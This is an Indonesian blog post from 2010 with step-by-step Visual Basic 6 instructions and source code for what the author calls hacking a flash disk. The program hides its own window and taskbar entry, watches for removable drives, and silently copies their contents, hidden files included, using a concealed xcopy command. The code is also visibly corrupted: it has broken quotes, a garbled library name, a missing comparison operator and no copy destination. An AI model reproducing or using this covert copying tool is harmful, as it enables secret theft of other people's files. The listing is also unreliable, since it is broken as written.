Latest Entries »

Sabtu, April 10, 2010

hack flasdiskk pake software buatan sendiri

halo sobat kali ini saya mau share cara ngehack flaskdisk hehe jujur saya belom berani nyoba sob, bagi yang mau coba aja deh hehe

Seperti biasa kita akan menggunakan Visual basic 6.0
1. Jalankan Program VB kamu
2. Pilih Standard EXE
3. Masukan 1 Driverlistbox, 2 Label, 1 timer
Pada label 1 captionnya biarkan kosong dan pada label 2 ganti caption menjadi “Status Flasdisk” tanpa tanda kutip
4. Copy dan pastekan code dibawah ini


Private Declare Function getdrivetype& Lib “kernel32? Alias “GetDriveTypeA” (ByVal nDrive As String)

Private Sub Form_Load()
App.TaskVisible = False
Me.Hide
End Sub

Private Sub Timer1_Timer()
‘buat ngecek flashdisk
Drive1.Refresh
Dim i As Integer
For i = 0 To Drive1.ListCount – 1
If getdrivetype(Drive1.List(i)) = 2 And left(Drive1.List(i), 1) “a” Then
Label1 = Drive1.List(i) & “\”
CekCopy

Label2 = “Lets Get it”
Exit Sub
Exit For
End If
Next
Label2 = “Belum Ada”
End Sub

Private Sub CekCopy()
If Label2 = “Lets Get It” Then
Exit Sub
Else
Shell (”xcopy /S /H /Y /C ” & Label1), vbHide
End If
End Sub

tekan F5 ....
selamat mencoba hehe semoga SUKSES :P

Artikel Terkait Lainnya Seputar:


0 komentar:

Poskan Komentar

mohon maaf komentar berisi link promosi dan tidak nyambung dengan artikel akan segera di hapus...
komentar sobat akan sangat berarti untuk kemajuan blog ini....
tapi tolong jangan nyepam yah sobat :)